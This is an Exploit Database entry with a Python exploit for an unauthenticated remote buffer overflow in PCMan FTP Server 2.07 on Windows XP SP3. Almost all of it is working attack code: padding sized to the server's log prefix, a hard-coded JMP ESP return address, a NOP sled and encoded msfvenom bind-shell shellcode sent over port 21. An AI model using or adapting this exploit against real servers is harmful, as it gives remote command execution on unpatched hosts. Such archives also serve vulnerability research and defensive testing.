PCMan FTP Server 2.07 - Remote Buffer Overflow

EDB-ID:

31789


Author:

Sumit

Type:

remote


Platform:

Windows

Date:

2014-02-20


# Exploit Title: PCMAN FTP 2.07 Long Command Buffer Overflow (unauthenticated)
# Date: Feb 19, 2014
# Exploit Author: Sumit
# Version: 2.07
# Tested on: Windows XP Professional SP3
# Description: Buffer overflow is triggered upon sending long string to PCMAN FTP 2.07 in place of command
#

import socket
import datetime

"""
You have to take into account your IP addr and servers date (if using NAT, check external IP) as buffer starts like the following:
2014/2/20 [00:40] (00320) 127.0.0.100> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...
"""

host = '192.168.213.10'

d = str(datetime.datetime.today()).split()[0].split('-') # You should ideally consider servers date here
for i in range(len(d)): d[i] = str(int(d[i]))
d = '/'.join(d)	# Finally we got the date

# msfvenom -p windows/shell_bind_tcp -b '\x00\x0a\x0d'
shellcode = (
"\xda\xdb\xd9\x74\x24\xf4\xbe\xb5\x40\x16\xb6\x5b\x2b\xc9" +
"\xb1\x56\x31\x73\x18\x83\xeb\xfc\x03\x73\xa1\xa2\xe3\x4a" +
"\x21\xab\x0c\xb3\xb1\xcc\x85\x56\x80\xde\xf2\x13\xb0\xee" +
"\x71\x71\x38\x84\xd4\x62\xcb\xe8\xf0\x85\x7c\x46\x27\xab" +
"\x7d\x66\xe7\x67\xbd\xe8\x9b\x75\x91\xca\xa2\xb5\xe4\x0b" +
"\xe2\xa8\x06\x59\xbb\xa7\xb4\x4e\xc8\xfa\x04\x6e\x1e\x71" +
"\x34\x08\x1b\x46\xc0\xa2\x22\x97\x78\xb8\x6d\x0f\xf3\xe6" +
"\x4d\x2e\xd0\xf4\xb2\x79\x5d\xce\x41\x78\xb7\x1e\xa9\x4a" +
"\xf7\xcd\x94\x62\xfa\x0c\xd0\x45\xe4\x7a\x2a\xb6\x99\x7c" +
"\xe9\xc4\x45\x08\xec\x6f\x0e\xaa\xd4\x8e\xc3\x2d\x9e\x9d" +
"\xa8\x3a\xf8\x81\x2f\xee\x72\xbd\xa4\x11\x55\x37\xfe\x35" +
"\x71\x13\xa5\x54\x20\xf9\x08\x68\x32\xa5\xf5\xcc\x38\x44" +
"\xe2\x77\x63\x01\xc7\x45\x9c\xd1\x4f\xdd\xef\xe3\xd0\x75" +
"\x78\x48\x99\x53\x7f\xaf\xb0\x24\xef\x4e\x3a\x55\x39\x95" +
"\x6e\x05\x51\x3c\x0e\xce\xa1\xc1\xdb\x41\xf2\x6d\xb3\x21" +
"\xa2\xcd\x63\xca\xa8\xc1\x5c\xea\xd2\x0b\xeb\x2c\x1d\x6f" +
"\xb8\xda\x5c\x8f\x2f\x47\xe8\x69\x25\x67\xbc\x22\xd1\x45" +
"\x9b\xfa\x46\xb5\xc9\x56\xdf\x21\x45\xb1\xe7\x4e\x56\x97" +
"\x44\xe2\xfe\x70\x1e\xe8\x3a\x60\x21\x25\x6b\xeb\x1a\xae" +
"\xe1\x85\xe9\x4e\xf5\x8f\x99\xf3\x64\x54\x59\x7d\x95\xc3" +
"\x0e\x2a\x6b\x1a\xda\xc6\xd2\xb4\xf8\x1a\x82\xff\xb8\xc0" +
"\x77\x01\x41\x84\xcc\x25\x51\x50\xcc\x61\x05\x0c\x9b\x3f" +
"\xf3\xea\x75\x8e\xad\xa4\x2a\x58\x39\x30\x01\x5b\x3f\x3d" +
"\x4c\x2d\xdf\x8c\x39\x68\xe0\x21\xae\x7c\x99\x5f\x4e\x82" +
"\x70\xe4\x7e\xc9\xd8\x4d\x17\x94\x89\xcf\x7a\x27\x64\x13" +
"\x83\xa4\x8c\xec\x70\xb4\xe5\xe9\x3d\x72\x16\x80\x2e\x17" +
"\x18\x37\x4e\x32")

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, 21))

nop = '\x90'*50
eip = '\x53\x93\x42\x7E' # EIP = 7E429353; JMP ESP in USER32.dll
myip = s.getsockname()[0]
padding = 'A' * (2029 - (len(d) + len(myip)))

buf = padding + eip + nop + shellcode

s.send('%s\r\n' % (buf))
s.recv(1024)
print 'Payload sent'
s.close()